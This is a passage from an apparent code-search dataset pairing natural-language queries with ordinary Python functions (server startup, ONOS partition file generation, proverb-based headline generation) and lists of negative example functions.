"async def start(self):\n self._app = web.Application(\n loop=self._loop, middlewares=self._middlewares\n )\n for resource in self._nyuki.HTTP_RESOURCES:\n resource.RESOURCE_CLASS.register(self._nyuki, self._app.router)\n log.info(\"Starting the http server on {}:{}\".format(self._host, self._port))\n self._handler = self._app.make_handler(access_log=access_log)\n self._server = await self._loop.create_server(\n self._handler, host=self._host, port=self._port\n )",
"def start_http_server(port, addr=''):\n class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):\n pass\n class PrometheusMetricsServer(threading.Thread):\n def run(self):\n httpd = ThreadingSimpleServer((addr, port), MetricsHandler)\n httpd.serve_forever()\n t = PrometheusMetricsServer()\n t.daemon = True\n t.start()",
"def daemon(path=\".\", address=None, port=None):\n # TODO(jelmer): Support git-daemon-export-ok and --export-all.\n backend = FileSystemBackend(path)\n server = TCPGitServer(backend, address, port)\n server.serve_forever()",
"def start_server(port: int):\n run(port)",
"def run(self):\n # Truncate the log file if it already exists.\n if os.path.exists(self.log_file):\n osutils.SafeUnlink(self.log_file, sudo=True)\n\n path_resolver = path_util.ChrootPathResolver()\n\n port = self.port if self.port else 0\n cmd = [self.devserver_bin,\n '--pidfile', path_resolver.ToChroot(self._pid_file),\n '--logfile', path_resolver.ToChroot(self.log_file),\n '--port=%d' % port,\n '--critical_update']\n\n if not self.port:\n cmd.append('--portfile=%s' % path_resolver.ToChroot(self.port_file))\n\n if self.static_dir:\n cmd.append(\n '--static_dir=%s' % path_resolver.ToChroot(self.static_dir))\n\n if self.src_image:\n cmd.append('--src_image=%s' % path_resolver.ToChroot(self.src_image))\n\n if self.board:\n cmd.append('--board=%s' % self.board)\n\n chroot_args = ['--no-ns-pid']\n result = self._RunCommand(\n cmd, enter_chroot=True, chroot_args=chroot_args,\n cwd=constants.SOURCE_ROOT, error_code_ok=True,\n redirect_stdout=True, combine_stdout_stderr=True)\n if result.returncode != 0:\n msg = (('Devserver failed to start!\\n'\n '--- Start output from the devserver startup command ---\\n'\n '%s'\n '--- End output from the devserver startup command ---') %\n (result.output))\n logging.error(msg)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Generate a custom metadata file in the root directory using the custom onos-gen-partitions script, which should also be located in the root directory. Note that this function needs to be run after the start function has been called for this instance.
|
def generateFile( self, nodes, equal=False, filename="cluster.json" ):
    retValue = main.TRUE
    try:
        if self.component.handle:
            assert self.component, "Component not specified. Please start the server first"
            assert self.rootDir, "Root directory not found"
            handle = self.component.handle
            # cd to rootDir
            handle.sendline( "cd " + str( self.rootDir ) )
            handle.expect( "\$" )
            cmd = "./onos-gen-partitions {} {} ".format( filename, nodes )
            if equal:
                cmd += "-e"
            handle.sendline( cmd )
            handle.expect( "\$" )
            response = handle.before
            # Return to home dir
            handle.sendline( "cd " + self.component.home )
            handle.expect( "\$" )
            response += handle.before
            if "Traceback" in response:
                main.log.error( handle.before )
                retValue = main.FALSE
        else:
            main.log.error( "Component handle is not set" )
            retValue = main.FALSE
    except Exception:
        main.log.exception( "Error generating metadata file" )
    return retValue
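
The command string itself can be checked in isolation; a small sketch of what the method sends over the handle (build_gen_partitions_cmd is a hypothetical helper, not part of the driver):

def build_gen_partitions_cmd(filename, nodes, equal=False):
    # mirrors the command assembled above
    cmd = "./onos-gen-partitions {} {} ".format(filename, nodes)
    if equal:
        cmd += "-e"
    return cmd

assert build_gen_partitions_cmd("cluster.json", 3) == "./onos-gen-partitions cluster.json 3 "
assert build_gen_partitions_cmd("cluster.json", 3, equal=True).endswith("-e")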
|
[
"def post_build_write_partitions(self):\n import yaml\n\n if self.database.exists():\n partitions = [\n p.identity.name.partital_dict for p in self.partitions]\n\n else:\n partitions = []\n\n fn = self.filesystem.path('meta', 'partitions.yaml')\n\n with open(fn, 'w') as f:\n yaml.safe_dump(\n partitions,\n f,\n default_flow_style=False,\n indent=4,\n encoding='utf-8')",
"def metadata_create_cmd():\n def processor(cm):\n print_cmd_status('Create the +metadata-extended and populate it')\n _, errors = cm.update_metadata_extended(overwrite=True)\n for e in errors:\n print_cmd_warning(e)\n return cm\n return processor",
"def generate_metadata(self):\n\n if not os.path.exists(self.output):\n os.makedirs(self.output)\n\n if self.options.profile == 'mercator':\n\n (south, west) = self.mercator.MetersToLatLon(self.ominx,\n self.ominy)\n (north, east) = self.mercator.MetersToLatLon(self.omaxx,\n self.omaxy)\n (south, west) = (max(-85.05112878, south), max(-180.0,\n west))\n (north, east) = (min(85.05112878, north), min(180.0, east))\n self.swne = (south, west, north, east)\n\n # Generate googlemaps.html\n\n if self.options.webviewer in ('all', 'google') \\\n and self.options.profile == 'mercator':\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'googlemaps.html')):\n f = open(os.path.join(self.output, 'googlemaps.html'\n ), 'w')\n f.write(self.generate_googlemaps())\n f.close()\n\n # Generate openlayers.html\n\n if self.options.webviewer in ('all', 'openlayers'):\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'openlayers.html')):\n f = open(os.path.join(self.output, 'openlayers.html'\n ), 'w')\n f.write(self.generate_openlayers())\n f.close()\n elif self.options.profile == 'geodetic':\n\n (west, south) = (self.ominx, self.ominy)\n (east, north) = (self.omaxx, self.omaxy)\n (south, west) = (max(-90.0, south), max(-180.0, west))\n (north, east) = (min(90.0, north), min(180.0, east))\n self.swne = (south, west, north, east)\n\n # Generate openlayers.html\n\n if self.options.webviewer in ('all', 'openlayers'):\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'openlayers.html')):\n f = open(os.path.join(self.output, 'openlayers.html'\n ), 'w')\n f.write(self.generate_openlayers())\n f.close()\n elif self.options.profile == 'raster':\n\n (west, south) = (self.ominx, self.ominy)\n (east, north) = (self.omaxx, self.omaxy)\n\n self.swne = (south, west, north, east)\n\n # Generate openlayers.html\n\n if self.options.webviewer in ('all', 'openlayers'):\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'openlayers.html')):\n f = open(os.path.join(self.output, 'openlayers.html'\n ), 'w')\n f.write(self.generate_openlayers())\n f.close()\n\n # Generate tilemapresource.xml.\n\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'tilemapresource.xml')):\n f = open(os.path.join(self.output, 'tilemapresource.xml'),\n 'w')\n f.write(self.generate_tilemapresource())\n f.close()\n\n if self.kml:\n\n # TODO: Maybe problem for not automatically generated tminz\n # The root KML should contain links to all tiles in the tminz level\n\n children = []\n (xmin, ymin, xmax, ymax) = self.tminmax[self.tminz]\n for x in range(xmin, xmax + 1):\n for y in range(ymin, ymax + 1):\n children.append([x, y, self.tminz])\n\n # Generate Root KML\n\n if self.kml:\n if not self.options.resume \\\n or not os.path.exists(os.path.join(self.output,\n 'doc.kml')):\n f = open(os.path.join(self.output, 'doc.kml'), 'w')\n f.write(self.generate_kml(None, None, None,\n children))\n f.close()",
"def create_metafile(root_data_dir, data_extension, output_filename, full_path=True):\n matches = []\n for root, dirnames, filenames in os.walk(root_data_dir):\n for filename in fnmatch.filter(filenames, '*.%s' % data_extension):\n matches.append(os.path.join(root, filename))\n\n matches = sorted(matches)\n\n names = [os.path.split(i) for i in matches]\n if not full_path:\n names = [ ('.', i[1]) for i in names ]\n\n labels = [ i[1].split('_')[0] for i in names]\n\n out = [ \"\\t\".join( [names[i][0] + '/' + names[i][1], labels[i] ] ) + \"\\n\" for i in xrange(len(labels)) ]\n\n output = open(output_filename, 'w')\n output.writelines(out)\n output.close()",
"def _generate_and_add_master_file_to_orchestrator_folder(folder):\n with open(os.path.join(folder, ORCH_MAIN_FILE), \"w\") as f:\n f.write(ORCH_STR_FILE)",
"def generate_mdata_filepath(self):\n\n # generate .mdata file name and folder\n mdata_name = os.path.basename(self.fpath).rpartition(\".\")[0]\n mdata_folder_name = os.path.basename(os.path.dirname(self.fpath))\n mdata_path = os.path.join(os.path.dirname(self.fpath), \"{}_mdata\".format(mdata_folder_name))\n \n # generate .mdata folder if not existent\n utils.make_dirs_if_not_existent(mdata_path)\n\n # generate and return proper .mdata file path\n return os.path.join(mdata_path, \"{}.mdata\".format(mdata_name))",
"def generate_file_system(self):\n logging.info('Start generating image \\'' + self.name + '\\' file system...')",
"def generate_dataset(input_folder: str, output_folder: str,\n generate_num: int, output_index_start: int, final_augment: bool = False) -> None:\n \n # defaults\n width = (1900, 2000) # min and max width\n height = (128, 140) # min and max height\n gt = \"simple\" # 'simple': label-string, 'boxfile': bounding boxes (may lead to errors with augmentation),\n # 'boxDisplay': bounding boxes + visualization during creation\n num_of_voices = 4 #\n\n empty_measure_chance = 3 # 1 in x chance\n empty_measure_width = (0, 120) # min and max width\n filled_measure_width = (240, 440) # min and max width\n\n side_measure_offset_x = (40, 80) # left and right side\n level_offset_y = (55, 105) # first and second level end\n block_offset_xy = ((2, 20), (5, 20)) # x and y direction min and max width\n symbol_offset_xy = (2, 2) # x and y direction offset\n\n background_offset = 20 # all sides margin\n border_image_chance = 5 # 1 in x chance\n prev_background_blend = (0.0, 0.25) # min and max blend\n\n background_images = load_labelset(os.path.join(input_folder, 'backgrounds'))\n\n duration_labelset = load_labelset_and_metadata(input_folder, 'duration')\n note_labelset = load_labelset_and_metadata(input_folder, 'note')\n rest_labelset = load_labelset_and_metadata(input_folder, 'rest')\n special_labelset = load_labelset_and_metadata(input_folder, 'special')\n\n files_per_folder = 1000\n show_progress_bar = True\n\n generator = RandomImageGenerator(image_width=width, image_height=height, num_of_voices=num_of_voices,\n background_images=background_images,\n duration_labelset=duration_labelset,\n note_labelset=note_labelset,\n rest_labelset=rest_labelset,\n special_labelset=special_labelset,\n background_offset=background_offset, border_image_chance=border_image_chance,\n prev_background_blend=prev_background_blend,\n empty_measure_chance=empty_measure_chance, empty_measure_width=empty_measure_width,\n filled_measure_width=filled_measure_width,\n side_measure_offset_x=side_measure_offset_x, level_offset_y=level_offset_y,\n block_offset_xy=block_offset_xy,\n symbol_offset_xy=symbol_offset_xy,\n final_augment=final_augment, gt=gt)\n\n generator.generate_random_rows_batch(generate_num=generate_num, output_index_start=output_index_start,\n output_folder=output_folder, files_per_folder=files_per_folder,\n show_progress_bar=show_progress_bar)",
"def _build_metadata(self):\n builder = os.path.join(self.dirname, 'metadata-builder.py')\n if not os.path.exists(builder):\n return\n\n log(\"{0} exists. Running it...\".format(builder))\n metadata = os.path.join(self.dirname, 'metadata.yaml')\n if os.path.exists(metadata):\n backup = os.path.join(self.dirname, 'metadata.yaml.bak')\n shutil.copy(metadata, backup)\n log(\"Existing {0} backed up to {1}\"\n .format(metadata, backup))\n\n if not (stat.S_IXUSR & os.stat(builder)[stat.ST_MODE]):\n raise ValueError(\n Fore.RED +\n \"{0} not executable\".format(builder) +\n Fore.RESET)\n cmds = ['./metadata-builder.py']\n retval = subprocess.check_call(cmds, cwd=self.dirname)\n\n if not os.path.exists(metadata):\n raise ValueError(\"Expected {0} but was not created by {1}\"\n .format(metadata, builder))",
"def maya_file_generator(root_path, skip='None', descend='True'):\n\n pass",
"def meta_file_inf(tmpdir_factory, pickle_file):\n meta_path = tmpdir_factory.mktemp(\"\").join(\"metadata_inf.pkl\")\n mock_dict = {\n 'group': [1, np.nan, 8],\n 'file_path': [str(pickle_file)] * 3,\n 'data_ok': [1, 1, 0]\n }\n mock_df = pd.DataFrame(mock_dict)\n mock_df.to_pickle(meta_path)\n return meta_path",
"def generate_files():\n \n # Generate a default job_file if necessary\n genfilename = \"job_file\"\n if os.path.exists(genfilename):\n logging.info(\"'job_file' already exists.\")\n else:\n genfile = open(genfilename, \"w\")\n genfile.write( \\\n \"username = '<user>'\\n\" \\\n \"nodes = [1]\\n\" \\\n \"foldername = 'experiment'\\n\" \\\n \"numreps = 1\\n\" \\\n \"exename = '<exe>'\\n\" \\\n \"exeinput = '%s'\\n\" \\\n \"exeseeds = 'integer'\\n\" \\\n )\n genfile.close()\n \n # Generate the config directory if necessary\n gendirname = \"config\"\n if os.path.exists(gendirname):\n logging.info(\"'config' directory already exists\")\n else:\n os.makedirs(gendirname)",
"def make_go_meta_files(mt: list) -> None:\n # mt = pickle.load(open(f\"{DATA_PATH}/mt_dgp.pkl\", \"rb\"))\n for i, ns_nsid in enumerate([(\"bp\", \"GO:0008150\"), (\"mf\", \"GO:0003674\"), (\"cc\", \"GO:0005575\")]):\n namespace, ns_id = ns_nsid\n ns_data = list()\n ns_data.append(ns_id)\n ns_data.append(mt[0]) # go_namespace\n ns_data.append(set(mt[i + 1])) # set of all go terms in namespace\n ns_data.append(mt[i + 1]) # list of all go terms in namespace\n ns_data.append(set().union(*mt[1:])) # all go terms\n ns_data.append({go_id: i for i, go_id in enumerate(mt[i + 1])}) # go_id: namespace\n pickle.dump(ns_data, open(f\"{DATA_PATH}/{namespace}_go_meta.pkl\", \"wb\"))",
"def generate_cluster_info(self):\n logger.info(\"Generating cluster information file\")\n\n # get kubeconfig and upload to httpd server\n kubeconfig = os.path.join(\n self.cluster_path, config.RUN.get(\"kubeconfig_location\")\n )\n remote_path = os.path.join(\n config.ENV_DATA.get(\"path_to_upload\"),\n f\"{config.RUN.get('run_id')}_kubeconfig\",\n )\n upload_file(\n config.ENV_DATA.get(\"httpd_server\"),\n kubeconfig,\n remote_path,\n config.ENV_DATA.get(\"httpd_server_user\"),\n config.ENV_DATA.get(\"httpd_server_password\"),\n )\n\n # Form the kubeconfig url path\n kubeconfig_url_path = os.path.join(\n \"http://\",\n config.ENV_DATA.get(\"httpd_server\"),\n remote_path.lstrip(\"/var/www/html/\"),\n )\n config.ENV_DATA[\"kubeconfig_url\"] = kubeconfig_url_path\n\n # get the infra_id\n infra_id = get_infra_id(self.cluster_path)\n config.ENV_DATA[\"infra_id\"] = infra_id\n\n # get the cluster id\n cluster_id = get_cluster_id(self.cluster_path)\n config.ENV_DATA[\"cluster_id\"] = cluster_id\n\n # fetch the installer version\n installer_version_str = run_cmd(\n f\"{config.RUN['bin_dir']}/openshift-install version\"\n )\n installer_version = installer_version_str.split()[1]\n config.ENV_DATA[\"installer_version\"] = installer_version\n\n # get the major and minor version of OCP\n version_obj = Version(installer_version)\n ocp_version_x = version_obj.major\n ocp_version_y = version_obj.minor\n config.ENV_DATA[\"ocp_version_x\"] = ocp_version_x\n config.ENV_DATA[\"ocp_version_y\"] = ocp_version_y\n\n # generate the cluster info yaml file\n terraform_var_template = \"cluster_info.yaml.j2\"\n terraform_var_template_path = os.path.join(\n \"ocp-deployment\", terraform_var_template\n )\n terraform_config_str = self._templating.render_template(\n terraform_var_template_path, config.ENV_DATA\n )\n terraform_var_yaml = os.path.join(\n self.cluster_path,\n constants.TERRAFORM_DATA_DIR,\n constants.SCALEUP_TERRAFORM_DATA_DIR,\n \"cluster_info.yaml\",\n )\n\n with open(terraform_var_yaml, \"w\") as f:\n f.write(terraform_config_str)\n\n # config.ENV_DATA['dns_server'] = config.ENV_DATA['dns']\n template_vars = (\n f\"\\\"dns_server: {config.ENV_DATA['dns']}\"\n f\"\\\\nremove_rhcos_worker: 'yes'\\\\n\\\"\"\n )\n\n replace_content_in_file(terraform_var_yaml, \"PLACEHOLDER\", template_vars)\n logger.info(f\"cluster yaml file: {terraform_var_yaml}\")",
"def master_info_writer(master_info, out_path, prefix):\n\n # Write general content\n out_file_name = 'low_frequency_gene_placement.tsv' # Previously 'low_frequency_gene_placement.tsv' - Proposed name: core_region_content.tsv\n if prefix is not None:\n out_file_name = f'{prefix}_{out_file_name}'\n with open(os.path.join(out_path, out_file_name), 'w', newline='', encoding='utf-8') as out_file:\n writer = csv.writer(out_file, delimiter=\"\\t\")\n\n # Create header\n header = ['Gff', 'Core_gene_1', 'Core_gene_2', 'Core_region_size',\n 'Core_region_accessory_count']\n writer.writerow(header)\n\n # Write remaining rows:\n for key in sorted(master_info.keys()):\n info = master_info[key][0:5]\n\n writer.writerow(info)\n\n # Write gene content in long format\n out_file_name = 'core_core_accessory_gene_content.tsv' # Previously core_core_accessory_gene_content.tsv - Proposed name: accessory_gene_placement.tsv\n if prefix is not None:\n out_file_name = f'{prefix}_{out_file_name}'\n\n with open(os.path.join(out_path, out_file_name), 'w', newline='', encoding='utf-8') as out_file:\n writer = csv.writer(out_file, delimiter=\"\\t\")\n\n # Create header\n header = ['Gff', 'Core_gene_1', 'Core_gene_2', 'gene', 'type']\n writer.writerow(header)\n\n # Write remaining rows:\n for key in sorted(master_info.keys()):\n core_core_region = master_info[key]\n if len(core_core_region[5]):\n for gene in core_core_region[5]:\n row = [core_core_region[0],\n core_core_region[1],\n core_core_region[2],\n gene,\n 'intermediate_frequency']\n writer.writerow(row)\n\n if len(core_core_region[6]):\n for gene in core_core_region[6]:\n row = [core_core_region[0],\n core_core_region[1],\n core_core_region[2],\n gene,\n 'low_frequency']\n writer.writerow(row)",
"def get_files_to_generate(self):\r\n pass",
"def create_metaxml(self):\n metaxml_path = os.path.join(self.bdist_dir, 'meta.xml')\n log.info(\"Writing %s\", metaxml_path)\n with open(metaxml_path, 'wb') as metaxml_file:\n root = ET.Element('root')\n id = ET.SubElement(root, 'id')\n id.text = '%s.%s' % (self.author_id, self.mod_id)\n version = ET.SubElement(root, 'version')\n version.text = self.mod_version\n name = ET.SubElement(root, 'name')\n name.text = self.distribution.get_name()\n description = ET.SubElement(root, 'description')\n description.text = self.distribution.get_description()\n xml_contents = ET.tostring(root, encoding='utf-8')\n xml_contents = minidom.parseString(xml_contents).toprettyxml(encoding='utf-8')\n metaxml_file.write(xml_contents)",
"def generate_mps_files(self):\n print(\"starting mps generation\")\n # setting antares options\n print(\"-- pre antares\")\n self.pre_antares()\n # launching antares\n print(\"-- launching antares\")\n antares_output_name = self.launch_antares()\n # writting things\n print(\"-- post antares\")\n lp_path = self.post_antares(antares_output_name)\n return lp_path",
"def process_mocs(tgen):\n\n # pylint: disable = invalid-name\n\n moc = getattr(tgen, 'moc', [])\n if not moc:\n return\n\n bld = tgen.bld\n bconfManager = getattr(bld, 'bconfManager', None)\n\n if not bconfManager:\n # it's called from a config action\n qt5.process_mocs(tgen)\n return\n\n rootdir = bconfManager.root.rootdir\n taskParams = getattr(tgen, 'zm-task-params')\n\n startNode = bld.getStartDirNode(taskParams['$startdir'])\n moc = getNodesFromPathsConf(bld, moc, rootdir)\n moc = _filterMocHeaders(moc)\n # moc headers as 'includes' paths must be relative to the startdir\n moc = [x.path_from(startNode) for x in moc]\n tgen.moc = moc\n\n qt5.process_mocs(tgen)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Given a headline, this function applies the chosen generation method to produce new expressions based on proverbs and selected keywords (computed by different methods).
|
def headline_generator_v2(headline, use_expressions, model, dict_forms_labels, dict_lemmas_labels, gen_method,
                          headline_keywords=None, shorter_expressions=None):
    print("[START] ", headline, "["+gen_method+"]")
    all_generated_expressions = []
    if not headline_keywords:
        print("[WARNING] No headline keywords given, getting them now...")
        nlpyport.load_config()
        headline_tokens = get_tokens(headline)
        headline_keywords = get_headline_keywords(headline, headline_tokens, dict_forms_labels, model, min=1, max=4)
    # -------- Adaptation -----------
    if headline_keywords:
        if gen_method == SUBSTITUTION:
            all_generated_expressions = substitution_many(use_expressions, headline_keywords, dict_forms_labels, dict_lemmas_labels, model)
        elif gen_method == ANALOGY:
            all_generated_expressions = analogy_many(use_expressions, headline, headline_keywords[:2], dict_forms_labels, dict_lemmas_labels, model)
        elif gen_method == VEC_DIFF:
            all_generated_expressions = vecdiff_many(use_expressions, headline_keywords[:2], dict_forms_labels, dict_lemmas_labels, model)
        if shorter_expressions:
            more_generated_expressions = substitution_many(shorter_expressions, headline_keywords, dict_forms_labels, dict_lemmas_labels, model)
            if all_generated_expressions and more_generated_expressions:
                all_generated_expressions.extend(more_generated_expressions)
            elif more_generated_expressions:
                all_generated_expressions = more_generated_expressions
    if not all_generated_expressions:
        print("[ERROR] Could not generate expression with "+gen_method)
        return None
    return all_generated_expressions
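
The three-way branch on gen_method could also be table-driven, which keeps the dispatch in one place; a self-contained sketch with stub generators standing in for substitution_many, analogy_many and vecdiff_many (the constant values and the stubs are assumptions for illustration only):

SUBSTITUTION, ANALOGY, VEC_DIFF = "substitution", "analogy", "vec_diff"

def substitute_stub(expressions, keywords):
    # toy replacement of a placeholder word by the first keyword
    return [e.replace("X", keywords[0]) for e in expressions]

def analogy_stub(expressions, keywords):
    return [e + " (analogy on: " + ", ".join(keywords[:2]) + ")" for e in expressions]

GENERATORS = {
    SUBSTITUTION: substitute_stub,
    ANALOGY: analogy_stub,
    VEC_DIFF: analogy_stub,  # placeholder; the real vec-diff method differs
}

def generate(expressions, keywords, gen_method):
    if gen_method not in GENERATORS:
        raise ValueError("unknown generation method: " + gen_method)
    return GENERATORS[gen_method](expressions, keywords)

print(generate(["all roads lead to X"], ["Lisboa"], SUBSTITUTION))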
|
[
"def new_headline(head1, head2):\n print(head1, \" | \", head2)\n pn1 = get_ps(head1, list(['NNP', 'NNPS']))\n pn2 = get_ps(head2, list(['NNP', 'NNPS']))\n adj1 = get_ps(head1, list(['JJ']))\n adj2 = get_ps(head2, list(['JJ']))\n if random.choice([True, False]):\n pn_reps = list(zip(pn1, pn2))\n adj_reps = list(zip(adj1, adj2))\n head = head1\n else:\n pn_reps = list(zip(pn2, pn1))\n adj_reps = list(zip(adj2, adj1))\n head = head2\n success = False\n if len(pn_reps) :\n head = substitute(head, pn_reps)\n success = True\n if len(adj_reps) :\n head = substitute(head, adj_reps)\n if success:\n return head\n return False",
"def apply(self, name=\"\", headwords=None, spacing=\" \"):\n\n # check for sentence type in collection\n sentence = self.get(name)\n translation = self.get_translation(name)\n if not sentence or translation is None:\n print(f\"Failed to apply unidentified sentence named {name}\")\n return\n\n # expect full entries instead of tying this to dictionary with lookups\n # TODO: high-level sentence methods with lookups from the Language\n fetched_words = [\n entry for entry in headwords\n if isinstance(entry, dict) and set(entry).issuperset({'pos', 'sound', 'definition'}) \n ]\n\n # check that headwords match buildable sentence units\n if not isinstance(fetched_words, (list, tuple)):\n print(f\"Failed to apply sentence - expected headwords list not {headwords}\")\n return\n if len(sentence) != len(fetched_words):\n print(f\"Failed to apply sentence - number of headwords does not match fillable sentence units\")\n return len(fetched_words)\n \n # store final built units\n applied_sentence = []\n # peel apart unit-per-unit translation strings and unit reference indexes\n if translation:\n applied_translation, translation_indexes = list(zip(*translation))\n applied_translation = list(applied_translation)\n\n # iterate through both sentence units and headwords\n # - unit structure is (word_classes, properties)\n # - headwords is a map containing various representations of word and data\n for i, unit in enumerate(sentence):\n word_data = fetched_words[i]\n word_sounds = word_data['sound']\n word_pos = word_data['pos']\n word_definition = word_data['definition']\n unit_pos, unit_properties = unit\n # compare headword class to expected word class\n if word_pos not in unit_pos:\n #print(fetched_words)\n #print(unit)\n print(f\"Failed to apply sentence - word {word_sounds} part of speech {word_pos} does not match expected word class {unit_pos}\")\n return\n # create grammatical unit with headword and sentence unit properties\n built_unit = self.grammar.build_unit(\n word_sounds,\n properties=unit_properties,\n word_classes=word_pos\n )\n # add spacing separator and unit to sentence\n len(applied_sentence) > 0 and applied_sentence.append(spacing) \n [applied_sentence.append(unit_piece) for unit_piece in built_unit]\n\n # Translate the unit\n # step ahead if nothing to translate\n if not translation:\n continue\n # locate unit's related translation piece\n translation_index = translation_indexes.index(i)\n # format with headword at insertion symbol (see vet_translation)\n formatted_translation = applied_translation[translation_index].format(word_definition)\n applied_translation[translation_index] = formatted_translation\n\n # format and return sentence representation\n sentence_data = {\n 'sound': applied_sentence,\n 'change': applied_sentence, # TODO: run sound changes, s/c blocking spaces\n 'translation': applied_translation if translation else []\n }\n return sentence_data",
"def DefineHeadOfMatchPhrase(word):\n pass",
"def add_interpunction(self):\n for par in self.paragraphs:\n for observ in par.observations:\n\n # add a . after each sentence\n observ.observation_new += \".\"\n\n # add a capital letter at the beginning\n first_word = observ.observation_new.split()[0]\n # check if the first word is a number\n if not represents_integer(first_word):\n # first word is not an integer, so add capital letter\n observ.observation_new = observ.observation_new[0].capitalize() + observ.observation_new[1:]",
"def rules(terms_dataframe, text_dataframe):\n new_terms = []\n for terms in terms_dataframe['lemma']:\n # Get the same structure of terms as in text dataframe\n tmp = ' '.join(terms.split('-'))\n new_terms.append(tmp.split(' '))\n for i, token in enumerate(text_dataframe['lemma']):\n for j, t in enumerate(new_terms):\n # Case 1: term of size 3 seperated by dashes (ex: text-to-speech) and followed by 1, 2 Nouns or 1 Adj and 1 Noun is a term \n if len(t) == 3 and len(text_dataframe['lemma']) >= i + 5:\n if token == t[0] and text_dataframe['lemma'][i + 1] == '-' and (\n text_dataframe['lemma'][i + 2] == 'to' or text_dataframe['lemma'][i + 2] == 'of' or\n text_dataframe['lemma'][i + 2] == 'by' or text_dataframe['pattern'][i + 2] == 'N') and \\\n text_dataframe['lemma'][i + 3] == '-' and text_dataframe['lemma'][i + 4] == t[2]:\n # followed by 2 nouns (ex: text-to-speech modal synthesis)\n if (text_dataframe['pattern'][i + 5] == 'N' or text_dataframe['pattern'][i + 4] == 'A') and \\\n text_dataframe['pattern'][i + 6] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 6] = text_dataframe['tokens'][i + 6] + ']'\n elif text_dataframe['pattern'][i + 5] == 'N' or text_dataframe['pattern'][i + 5] == 'A':\n # followed by 1 noun (ex: text-to-speech system)\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 5] = text_dataframe['tokens'][i + 5] + ']'\n else:\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 4] = text_dataframe['tokens'][i + 4] + ']'\n # Case 2: term of size 2 separated by dashes (ex: encoder-decoder) and followed by 0,1,2 or 3 nouns is a term\n if len(t) >= 2 and len(text_dataframe['lemma']) >= i + 3 and i != 0:\n if token == 'front' and text_dataframe['lemma'][i + 1] == '-' and text_dataframe['lemma'][\n i + 2] == 'end':\n if text_dataframe['pattern'][i - 1] == 'N':\n text_dataframe['tokens'][i - 1] = '[' + text_dataframe['tokens'][i - 1]\n text_dataframe['tokens'][i + 2] = text_dataframe['tokens'][i + 2] + ']'\n if token == t[0] and text_dataframe['lemma'][i + 1] == '-' and text_dataframe['lemma'][i + 2] == t[1]:\n # followed by 3 nouns (ex: HMM-based generation synthesis approach)\n if text_dataframe['pattern'][i + 3] == 'N' and text_dataframe['pattern'][i + 4] == 'N' and \\\n text_dataframe['pattern'][i + 5] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 5] = text_dataframe['tokens'][i + 5] + ']'\n # followed by 2 nouns (ex: HMM-based generation synthesis)\n elif (text_dataframe['pattern'][i + 3] == 'N' or text_dataframe['pattern'][i + 3] == 'A' or\n text_dataframe['pattern'][i + 3] == 'V') and text_dataframe['pattern'][i + 4] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 4] = text_dataframe['tokens'][i + 4] + ']'\n # followed by 1 noun (ex: cross-lingual adaptation)\n elif text_dataframe['pattern'][i + 3] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 3] = text_dataframe['tokens'][i + 3] + ']'\n # followed by nothing (ex: mel-spectrogram)\n else:\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 2] = text_dataframe['tokens'][i + 2] + ']'\n if (\n token == 'data' or token == 'voice' or token == 'datum' or token == 'speaker' or token == 'dataset' or token == 'database' or token == 'feature' or token == 'corpus') and i != 0 
and len(\n text_dataframe['lemma']) >= i + 1:\n if text_dataframe['pattern'][i - 1] == 'N' or text_dataframe['pattern'][i - 1] == 'A':\n text_dataframe['tokens'][i - 1] = '[' + text_dataframe['tokens'][i - 1]\n text_dataframe['tokens'][i] = text_dataframe['tokens'][i] + ']'\n elif text_dataframe['pattern'][i + 1] == 'N':\n text_dataframe['tokens'][i] = '[' + text_dataframe['tokens'][i]\n text_dataframe['tokens'][i + 1] = text_dataframe['tokens'][i + 1] + ']'\n if i != 0:\n if text_dataframe['lemma'][i - 1] in rule_adj and '[' in text_dataframe['tokens'][i]:\n text_dataframe['tokens'][i - 1] = '[' + text_dataframe['tokens'][i - 1] + ']'\n elif i >= 3 and text_dataframe['lemma'][i - 1] in rule_adj and text_dataframe['lemma'][\n i - 3] == 'non' and '[' in text_dataframe['tokens'][i]:\n text_dataframe['tokens'][i - 3] = '[' + text_dataframe['tokens'][i - 3]\n text_dataframe['tokens'][i - 3] = text_dataframe['tokens'][i - 1] + ']'",
"def _compile_vocabulary(self, phrases):\n text = \" \".join([(\"<s> %s </s>\" % phrase) for phrase in phrases])\n self._logger.debug('Compiling languagemodel...')\n vocabulary = self._compile_languagemodel(text, self.languagemodel_file)\n self._logger.debug('Starting dictionary...')\n self._compile_dictionary(vocabulary, self.dictionary_file)",
